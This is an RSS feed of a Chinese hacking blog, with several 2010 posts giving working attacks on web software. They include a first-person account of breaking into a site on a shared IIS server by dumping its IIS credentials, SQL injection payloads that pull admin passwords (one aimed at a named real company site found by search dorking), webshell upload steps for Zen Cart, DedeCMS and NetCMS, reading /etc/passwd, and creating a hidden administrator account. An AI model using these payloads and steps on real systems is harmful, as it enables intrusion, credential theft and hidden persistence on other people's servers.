<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns="http://purl.org/rss/1.0/">
<channel rdf:about="http://www.cnyzy.cn">
<title>影子鹰安全网络-主站技术BLOG</title>
<link>http://www.cnyzy.cn</link>
<description>影子鹰安全网络-主站技术BLOG</description>
<dc:language>zh-cn</dc:language>
<dc:creator>coolkawen@Gmail.com</dc:creator>
<items>
<rdf:Seq>
<item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1470"><title><![CDATA[使用Adsutil.vbs脚本获取IIS配置信息及账号密码]]></title><description><![CDATA[今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！<br><br>Set&nbsp;ObjService=GetObject(&quot;IIS://LocalHost/W3SVC&quot;)&nbsp;]]></description><content:encoded><![CDATA[<p id=fp>今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！<br><br>Set&nbsp;ObjService=GetObject(&quot;IIS://LocalHost/W3SVC&quot;)&nbsp;<br>For&nbsp;Each&nbsp;obj3w&nbsp;In&nbsp;objservice&nbsp;<br>If&nbsp;IsNumeric(obj3w.Name)&nbsp;Then&nbsp;<br>sServerName=Obj3w.ServerComment&nbsp;<br>Set&nbsp;webSite&nbsp;=&nbsp;GetObject(&quot;IIS://Localhost/W3SVC/&quot;&nbsp;&amp;&nbsp;obj3w.Name&nbsp;&amp;&nbsp;&quot;/Root&quot;)&nbsp;<br>ListAllWeb&nbsp;=&nbsp;ListAllWeb&nbsp;&amp;&nbsp;obj3w.Name&nbsp;&amp;&nbsp;String(25-Len(obj3w.Name),&quot;&nbsp;&quot;)&nbsp;&amp;&nbsp;obj3w.ServerComment&nbsp;&amp;&nbsp;&quot;(&quot;&nbsp;&amp;&nbsp;webSite.Path&nbsp;&amp;&nbsp;&quot;)&quot;&nbsp;&amp;&nbsp;vbCrLf&nbsp;<br>End&nbsp;If&nbsp;<br>Next&nbsp;<br>WScript.Echo&nbsp;ListAllWeb&nbsp;<br>Set&nbsp;ObjService=Nothing&nbsp;<br>WScript.Quit&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;将以上代码保存为1.vbs，执行”cscript&nbsp;C:\recycler\1.vbs“&nbsp;命令，cscript&nbsp;C:\recycler\1.vbs是我传到服务器上的路径，执行成功后就会列出IIS的基本信息了。<br><br>如上图所示，列出来的信息中包含了网站id&nbsp;显示名称&nbsp;以及路径三个信息，这里我们要记下目标站的id为：360363061，路径为：D:\wwwroot\fucksbhack8\wwwroot。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;现在就得到了目标网站的基本信息了，但是这对我们拿下最终目标站的权限有啥用呢？&nbsp;呵呵！不急，我们接下来就要想办法得到这个网站的iis用户名和密码，然后使用bs大牛写的webshell来夸目录。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;当时和龙儿心搞定了目标站路径信息后为得到目标站的IIS账号密码还真费了不少功夫，后来还是多亏了龙儿心给我看的一篇文章，仔细看了过后才明白了怎么使用Adsutil.vbs来获取IIS账号密码。首先搞个Adsutil.vbs文件来，文件内容太多，我就不贴出来了，本文中所用到的工具最后我会全部打包。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;搞到Adsutil.vbs文件后我们需要改动下内容，我首先搜索”If&nbsp;(Attribute&nbsp;=&nbsp;True)&nbsp;Then“，然后再下面几行中会看到如下内容：<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;(Attribute&nbsp;=&nbsp;True)&nbsp;Then<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IsSecureProperty&nbsp;=&nbsp;False<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IsSecureProperty&nbsp;=&nbsp;True<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;If<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;首先我们要获取目标站点IIS的账号，我们将第一个IsSecureProperty&nbsp;的值修改成IsSecureProperty&nbsp;=&nbsp;False，然后保存，上传到服务器上。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在执行的时候我们需要用到之前使用的vbs脚本获取到目标网站的id值，这里是360363061，然后我们使用”cscript&nbsp;C:\recycler\k.vbs&nbsp;enum&nbsp;w3svc/360363061/root“命令来获取目标站的IIS账号信息。如上图所示，成功的获取到目标站IIS账号为sbhack8_web，接下来我们就是获取密码了，同样的方法还需要将Adsutil.vbs文件中刚才修改的地方，将第二个IsSecureProperty&nbsp;修改成IsSecureProperty&nbsp;=&nbsp;False，然后再把第一个IsSecureProperty&nbsp;修改成IsSecureProperty&nbsp;=&nbsp;True，既两个的值互相调换一下，然后再执行同样的命令”cscript&nbsp;C:\recycler\k.vbs&nbsp;enum&nbsp;w3svc/360363061/root“来获取密码信息。<br>这样就搞到了目标站IIS用户的账号和密码了，先就要排bs大牛的shell上场了，在要使用BS大牛的shell之前我们还需要改动喜爱BS大牛的shell内容。<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;搜索bs大牛shell中内容”Const&nbsp;bOtherUser=False“，然后修改成”Const&nbsp;bOtherUser=True“，保存，上传到服务器任意网站目录下，当然还是要支持asp的了，然后访问，然后出现下图所示内容。这里直接点击OK，然后稍等下一下就会弹出登陆框了，如下图所示：然后我们在这里输入刚才得到的目标站的IIS账号和密码，然后登陆，成功了的话就会进入shell的登录框了。这里如数webshell的密码进入后直接拿目标站的路径跳转，然后就会发现目标站的目录和文件全部列出来了！不BT的话是有写入权限的！！方便大家我把文章中提及的工具全部打包了！！<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*最后补充下，我下来本地测试了下Adsutil.vbs的修改地方，我们直接将If&nbsp;(Attribute&nbsp;=&nbsp;True)&nbsp;Then下面的两个IsSecureProperty值都修改为True的时候就会同时列出账号和密码了，没必要获取了账号，然后再修改下去获取密码。<br><a href="http://www.51chi.net/sysexp/iisvbs.rar" target="_blank">http://www.51chi.net/sysexp/iisvbs.rar</a></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1470</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-3 8:47:11</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1469"><title><![CDATA[iwebshop0.7.7 0day]]></title><description><![CDATA[漏洞出在根目录的auction_list.php,第77行-86行:<br><br>/*&nbsp;浏览记录&nbsp;*/&nbsp;<br>$getcookie&nbsp;=&nbsp;get_hisgoods_cookie();&nbsp;<br>$goodshistory&nbsp;=&nbsp;array();&nbsp;]]></description><content:encoded><![CDATA[<p id=fp>漏洞出在根目录的auction_list.php,第77行-86行:<br><br>/*&nbsp;浏览记录&nbsp;*/&nbsp;<br>$getcookie&nbsp;=&nbsp;get_hisgoods_cookie();&nbsp;<br>$goodshistory&nbsp;=&nbsp;array();&nbsp;<br>if($getcookie)&nbsp;{&nbsp;<br>arsort($getcookie);&nbsp;<br>$getcookie&nbsp;=&nbsp;array_keys($getcookie);&nbsp;<br>$gethisgoodsid&nbsp;=&nbsp;implode(&quot;,&quot;,array_slice($getcookie,&nbsp;0,&nbsp;4));&nbsp;<br>$sql&nbsp;=&nbsp;&quot;select&nbsp;is_set_image,goods_id,goods_name,goods_thumb,goods_price&nbsp;from&nbsp;$t_goods&nbsp;where&nbsp;goods_id&nbsp;in&nbsp;($gethisgoodsid)&quot;;&nbsp;<br>$goodshistory&nbsp;=&nbsp;$dbo-&gt;getRs($sql);&nbsp;<br>}<br><br>$gethisgoodsid这个参数未经过滤就带入查询.它是由$getcookie得来的.跟一下$getcookie这个变量.即get_hisgoods_cookie()函数.<br><br>foundation/fcookie.php中:<br><br>function&nbsp;get_hisgoods_cookie()&nbsp;{&nbsp;<br>return&nbsp;get_cookie(&quot;hisgoods&quot;);&nbsp;<br>}<br><br>同样是foundation/fcookie.php:<br><br>function&nbsp;get_cookie($k)&nbsp;{&nbsp;<br>lobal&nbsp;$session_prefix;&nbsp;<br>if(isset($_COOKIE[$session_prefix.$k]))&nbsp;return&nbsp;$_COOKIE[$session_prefix.$k];&nbsp;<br>return&nbsp;null;&nbsp;<br>}<br><br>原来是在COOKIE里取得变量的,至此漏洞产生.<br><br>利用方法:先随便看一个商品,然后访问<a href="http://localhost/auction_list.php." target="_blank">http://localhost/auction_list.php.</a>使用cookies浏览器的话,你会发现里面会多了个类似&quot;iweb_hisgoods[22(这个数字是你访问过的商品的id)]=1282282762&quot;的项目.首先在&quot;22&quot;后面加个单引号,使其暴错,得出数据表的前缀.然后将&quot;22&quot;改为&quot;22)&nbsp;and&nbsp;1%3D2&nbsp;union&nbsp;select&nbsp;1,admin_password,admin_name,4,5&nbsp;from&nbsp;ishop_admin_user--&nbsp;&quot;(ishop_是你刚才得出的前缀,&quot;--&quot;即注释符后一定要加个空格).再访问<a href="http://localhost/auction_list.php" target="_blank">http://localhost/auction_list.php</a>,查看右下角最新浏览就会得出管理员的帐号和密码.<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1469</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-3 8:43:14</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1468"><title><![CDATA[cookie注射批量拿企业站]]></title><description><![CDATA[直接百度或者google一下<br><br>关键字：inurl:CompHonorBig.asp?id&nbsp;出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒<br><br>我们到后面几页随便打开一个&nbsp;http://www.xzruizhe.com/]]></description><content:encoded><![CDATA[<p id=fp>直接百度或者google一下<br><br>关键字：inurl:CompHonorBig.asp?id&nbsp;出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒<br><br>我们到后面几页随便打开一个&nbsp;<a href="http://www.xzruizhe.com/" target="_blank">http://www.xzruizhe.com/</a><br><br>打开教学教研这个栏目随便找到一篇文件..地址为;<a href="http://www.xzruizhe.com/shownews.asp?id=225&amp;BigClass=" target="_blank">http://www.xzruizhe.com/shownews.asp?id=225&amp;BigClass=</a>产品展示<br><br>现在我们可以开始输入注射语句了：<br><br>javascript:alert(document.cookie=&quot;id=&quot;+escape(&quot;86&nbsp;union&nbsp;select&nbsp;1,password,username,password,5,6,7,8,9,10,11&nbsp;from&nbsp;admin&quot;));<br><br>输入到IE中,然后会有一个提示&nbsp;<br><br>然后我们点确定,然后再进入<a href="http://www.xzruizhe.com/shownews.asp" target="_blank">http://www.xzruizhe.com/shownews.asp</a><br><br>我们可以看到现在的账号和密码已经被爆出来了.<br><br>接下来我们开始破解密码了..大家可以去www.cmd5.com破解就可以了.<br><br>之后开始登陆后台咯<br><br><a href="http://www." target="_blank">http://www.</a>你入侵的地址.com/admin<br><br><br>成功登陆了...<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1468</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-3 8:42:30</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1467"><title><![CDATA[微软全系统建立隐藏账户漏洞]]></title><description><![CDATA[可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..<br><br>可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:<br>net&nbsp;user&nbsp;123&nbsp;/add<br>net&nbsp;localgroup&nbsp;administrators&nbsp;/add]]></description><content:encoded><![CDATA[<p id=fp>可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..<br><br>可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:<br>net&nbsp;user&nbsp;123&nbsp;/add<br>net&nbsp;localgroup&nbsp;administrators&nbsp;/add<br>注意其中的空白字符.非空格.<br>建立后命令行下用net&nbsp;user命令查看账户显示为空白,在用户界面中同样显示空白.<br>建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.<br><br>新建一个批处理,内容如下.<br>net&nbsp;user&nbsp;123&nbsp;/add<br>net&nbsp;localgroup&nbsp;administrators&nbsp;/add<br>执行后查看用户管理界面,看看是否有个空白帐号.<br><br>修复方案：过滤这些特殊字符吧.</p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1467</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-3 8:41:51</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1466"><title><![CDATA[ecshop广告调用页消息头写入暴路]]></title><description><![CDATA[/affiche.php,php5环境提示错误暴露程序路径，php4环境显示写入的信息<br>charset参数未做严谨过滤导致http消息头截断写入<br>http://localhost/test/ecshop/affiche.php?act=js&amp;type=3&amp;from=xxx&amp;ad_id=1&amp;charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A&nbsp;<br><br>]]></description><content:encoded><![CDATA[<p id=fp>/affiche.php,php5环境提示错误暴露程序路径，php4环境显示写入的信息<br>charset参数未做严谨过滤导致http消息头截断写入<br><a href="http://localhost/test/ecshop/affiche.php?act=js&amp;type=3&amp;from=xxx&amp;ad_id=1&amp;charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A&nbsp;" target="_blank">http://localhost/test/ecshop/affiche.php?act=js&amp;type=3&amp;from=xxx&amp;ad_id=1&amp;charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A&nbsp;</a><br><br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1466</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-1 8:25:11</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1465"><title><![CDATA[动网PHP论坛preview.php代码执行漏洞]]></title><description><![CDATA[[b]动网（DVBBS）PHP论坛preview.php代码执行漏洞[/b]<br><br>动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。<br><br>在文件preview.php中：]]></description><content:encoded><![CDATA[<p id=fp><strong>动网（DVBBS）PHP论坛preview.php代码执行漏洞</strong><br><br>动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。<br><br>在文件preview.php中：<br>require&nbsp;printout(&#39;preview&#39;);&nbsp;//第9行<br>……<br>函数printout在文件inc/&nbsp;dv_clsmain.php中：<br>function&nbsp;printout($template,$ext=&quot;tpl.php&quot;){&nbsp;//第464行<br>文件最后包含了templates\default\&nbsp;preview.tpl.php文件<br>……<br>在文件templates\default\&nbsp;preview.tpl.php中：<br>$theBody&nbsp;=&amp;&nbsp;Dv_CodeProcess($theBody,&nbsp;$tmpuserinfo,&nbsp;Ubblist($theBody).&#39;39,&#39;,&nbsp;1,&nbsp;0);&nbsp;//第31行<br>&amp;&nbsp;Dv_CodeProcess函数在文件inc/dv_code.php文件中：<br>function&nbsp;&amp;Dv_CodeProcess(&amp;$code,&amp;$currUserInfo,$ubblists,$PostType=1,$sType=1)&nbsp;//第332行<br>……<br>$arrPattern[]&nbsp;=&nbsp;&#39;#\[url\s*=\s*([^\]]+)](.*?)\[img](.+?)\[\/img](.*?)\[/url]#iesm&#39;;&nbsp;&nbsp;&nbsp;//第415行<br>$arrRepl[]&nbsp;=&nbsp;&#39;\&#39;&lt;a&nbsp;href=&quot;\&#39;.str_filter_xss(&quot;$1&quot;).\&#39;&quot;&nbsp;target=&quot;_blank&quot;&gt;$2&lt;img&nbsp;src=&quot;\&#39;.str_filter_xss(&quot;$3&quot;).\&#39;&quot;&nbsp;border=&quot;0&quot;/&nbsp;&gt;$4&lt;/a&gt;\&#39;&#39;;<br>……<br>$returnval&nbsp;=&nbsp;preg_replace(&nbsp;$arrPattern&nbsp;,$arrRepl&nbsp;,$code&nbsp;);&nbsp;//第861行<br>函数preg_replace当第一个参数的正则表达式有e符号的时候，第二个参数的字符串当做PHP代码执行。</p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1465</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-9-1 8:24:49</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1464"><title><![CDATA[zen cart 1.38a 多处漏洞0day]]></title><description><![CDATA[&lt;form&nbsp;id=&quot;frmUpload&quot;&nbsp;enctype=&quot;multipart/form-data&quot;&nbsp;action=&quot;http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media&quot;&nbsp;method=&quot;post&quot;&gt;<br>Upload&nbsp;a&nbsp;new&nbsp;file:&lt;br&gt;<br>&lt;input&nbsp;type=&quot;file&quot;&nbsp;name=&quot;NewFile&quot;&nbsp;size=&quot;50&quot;&gt;&lt;br&gt;<br>&lt;input&nbsp;id=&quot;btnUpload&quot;&nbsp;type=&quot;submit&quot;&nbsp;value=&quot;Upload&quot;&gt;<br>&lt;/form&gt;]]></description><content:encoded><![CDATA[<p id=fp>&lt;form&nbsp;id=&quot;frmUpload&quot;&nbsp;enctype=&quot;multipart/form-data&quot;&nbsp;action=&quot;<a href="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media&quot;&nbsp;method=&quot;post&quot;&gt;" target="_blank">http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media&quot;&nbsp;method=&quot;post&quot;&gt;</a><br>Upload&nbsp;a&nbsp;new&nbsp;file:&lt;br&gt;<br>&lt;input&nbsp;type=&quot;file&quot;&nbsp;name=&quot;NewFile&quot;&nbsp;size=&quot;50&quot;&gt;&lt;br&gt;<br>&lt;input&nbsp;id=&quot;btnUpload&quot;&nbsp;type=&quot;submit&quot;&nbsp;value=&quot;Upload&quot;&gt;<br>&lt;/form&gt;<br><br><br>大家试下威力。&nbsp;直接上传PHP&nbsp;WEBSHELL&nbsp;到IMAGES<br><br><br>漏洞测试2：Zen&nbsp;Cart&nbsp;本地文件泄露<br><br>得到网页所在路径<br>/extras/ipn_test_return.php<br>得到网站配置信息<br>/extras/curltest.php?url=file:///网站地址/includes/configure.php<br>读取linux服务器passwd<br>/extras/curltest.php?url=file:///etc/passwd<br><br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1464</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-8-31 8:24:50</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1463"><title><![CDATA[DedeCmsV5.6 本地包含里的上传漏洞利用]]></title><description><![CDATA[本地包含的利用方法。<br><br>&lt;form&nbsp;action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&amp;action=xxx&amp;code=../../include/dialog/select_soft_post”&nbsp;method=”post”&nbsp;enctype=”multipart/form-data”&nbsp;name=”QuickSearch”&nbsp;id=”QuickSearch”&gt;<br>&lt;input&nbsp;type=”hidden”&nbsp;name=”newname”&nbsp;value=”1.asa”&gt;<br>&lt;input&nbsp;type=”file”&nbsp;name=”uploadfile”&gt;]]></description><content:encoded><![CDATA[<p id=fp>本地包含的利用方法。<br><br>&lt;form&nbsp;action=”<a href="http://www.ra1nker/plus/carbuyaction.php?dopost=return&amp;action=xxx&amp;code=../../include/dialog/select_soft_post" target="_blank">http://www.ra1nker/plus/carbuyaction.php?dopost=return&amp;action=xxx&amp;code=../../include/dialog/select_soft_post</a>”&nbsp;method=”post”&nbsp;enctype=”multipart/form-data”&nbsp;name=”QuickSearch”&nbsp;id=”QuickSearch”&gt;<br>&lt;input&nbsp;type=”hidden”&nbsp;name=”newname”&nbsp;value=”1.asa”&gt;<br>&lt;input&nbsp;type=”file”&nbsp;name=”uploadfile”&gt;<br>&lt;input&nbsp;type=”submit”&nbsp;value=”搜索”&nbsp;name=”QuickSearchBtn”&gt;<br>&lt;/form&gt;<br><br><br>上传一个图片木马（只改后辍名为图片类型就行），即可在网站根目录生成&nbsp;1.asa&nbsp;文件<br>简单分析：<br>文件：select_soft_post.php<br><br><br>01.if(!isset($cfg_basedir))&nbsp;02.{&nbsp;03.include_once(dirname(__FILE__).’/config.php’);&nbsp;04.}&nbsp;05.//config.php&nbsp;是用于验证是否管理员。由于本地包含，&nbsp;$cfg_basedir&nbsp;已经设置了值，应该跳过了验证。&nbsp;06.//文件名（前为手工指定，&nbsp;后者自动处理）&nbsp;07.if(!empty($newname))&nbsp;08.{&nbsp;09.$filename&nbsp;=&nbsp;$newname;&nbsp;10.if(!ereg(“\.”,&nbsp;$filename))&nbsp;$fs&nbsp;=&nbsp;explode(‘.’,&nbsp;$uploadfile_name);&nbsp;11.else&nbsp;$fs&nbsp;=&nbsp;explode(‘.’,&nbsp;$filename);&nbsp;12.if(eregi($cfg_not_allowall,&nbsp;$fs[count($fs)-1]))&nbsp;13.{&nbsp;14.ShowMsg(“你指定的文件名被系统禁止！”,’javascript:;’);&nbsp;15.exit();&nbsp;16.}&nbsp;17.if(!ereg(“\.”,&nbsp;$filename))&nbsp;$filename&nbsp;=&nbsp;$filename.’.’.$fs[count($fs)-1];&nbsp;18.}else{&nbsp;19.$filename&nbsp;=&nbsp;$cuserLogin-&gt;getUserID().’-’.dd2char(MyDate(‘ymdHis’,$nowtme));&nbsp;20.$fs&nbsp;=&nbsp;explode(‘.’,&nbsp;$uploadfile_name);&nbsp;21.if(eregi($cfg_not_allowall,&nbsp;$fs[count($fs)-1]))&nbsp;22.{&nbsp;23.ShowMsg(“你上传了某些可能存在不安全因素的文件，系统拒绝操作！”,’javascript:;’);&nbsp;24.exit();&nbsp;25.}&nbsp;26.$filename&nbsp;=&nbsp;$filename.’.’.$fs[count($fs)-1];&nbsp;27.}&nbsp;<br>问题就出在&nbsp;$newname&nbsp;那里，没验证上传类型，但验证了非可上传类型<br><br><br>01.//这里强制限定的某些文件类型禁止上传&nbsp;02.$cfg_not_allowall&nbsp;=&nbsp;“php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml”;&nbsp;<br>即可以上传非上面类型的文件，有时也并不鸡肋。。<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1463</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-8-28 14:27:36</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1462"><title><![CDATA[NetCms 注册上传漏洞 Oday]]></title><description><![CDATA[NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源&nbsp;,由于发表消息附件未<br><br>进行严格过滤，导致可上传任意文件漏洞。<br><br>测试利用：&nbsp;1、进去，&nbsp;/user/login.aspx&nbsp;，点注册。]]></description><content:encoded><![CDATA[<p id=fp>NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源&nbsp;,由于发表消息附件未<br><br>进行严格过滤，导致可上传任意文件漏洞。<br><br>测试利用：&nbsp;1、进去，&nbsp;/user/login.aspx&nbsp;，点注册。<br><br>2、在发表文章页面，点击“选择图片”，我们在这里，记下这个目录名，&nbsp;Userfiles/049357214223&nbsp;，&nbsp;这是你的附件保存的目录名。<br><br>3、然后在站内信息那块，&nbsp;给自己发送个站内信，附件里直接传马。<br><br><br>4、然后，在收件箱找到这个站内信，打开，下载附件，在这里记录下我们的马儿上传上去后的名字就好了。<br><br><br>得到马儿的新名字：&nbsp;c58f7a4d96073cafc.asp<br><br>5、然后，我们的马儿完整的路径就是&nbsp;Userfiles/049357214223/c58f7a4d96073cafc.asp，敲进地址栏，回车<br><br>二<br><br>继NetCms&nbsp;注册上传漏洞&nbsp;Oday后，又有人发现另一种上传漏洞。本文只作描述利用方法，仅供学习交流！<br><br>NetCms&nbsp;注册上传漏洞&nbsp;Oday<br><br>1.注册帐号<br><br>2.点击修改基本信息，然后点击自定义头像<br><br>3.点击上传文件<br><br>4.上传图片文件,（1.jpg这种格式也可以,后面有利用方法）<br><br>5.上传成功<br><br>6.访问<a href="http://www.ooxx.com/Userfiles/614846612009/123.asp;x.jpg" target="_blank">http://www.ooxx.com/Userfiles/614846612009/123.asp;x.jpg</a><br><br>7.点击修改,修改成123.asp<br><br>8.访问<a href="http://www.ooxx.com/Userfiles/614846612009/123.asp" target="_blank">http://www.ooxx.com/Userfiles/614846612009/123.asp</a><br><br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1462</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-8-26 11:30:51</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1461"><title><![CDATA[Discuz!漫游插件API本地包含漏洞]]></title><description><![CDATA[Discuz!漫游插件API本地包含漏洞,该插件默认不安装,并且服务默认不开启.<br><br>manyou/api/class/MyBase.php<br><br>128:&nbsp;function&nbsp;parseRequest()&nbsp;{]]></description><content:encoded><![CDATA[<p id=fp>Discuz!漫游插件API本地包含漏洞,该插件默认不安装,并且服务默认不开启.<br><br>manyou/api/class/MyBase.php<br><br>128:&nbsp;function&nbsp;parseRequest()&nbsp;{<br>131:&nbsp;$request&nbsp;=&nbsp;$_POST;<br>132:&nbsp;$module&nbsp;=&nbsp;$request[&#39;module&#39;];<br>133:&nbsp;$method&nbsp;=&nbsp;$request[&#39;method&#39;];<br>...<br>174:&nbsp;return&nbsp;$this-&gt;callback($module,&nbsp;$method,&nbsp;$params);<br>175:&nbsp;}<br><br>177:&nbsp;function&nbsp;callback($module,&nbsp;$method,&nbsp;$params)&nbsp;{<br>...<br>191:&nbsp;@include_once&nbsp;DISCUZ_ROOT.&#39;./manyou/api/class/&#39;.$module.&#39;.php&#39;;<br><br>首发路人甲，由情整理编辑<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1461</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2010-8-26 11:30:04</dc:date></item>
</rdf:Seq>
</items>
</channel>
</rdf:RDF>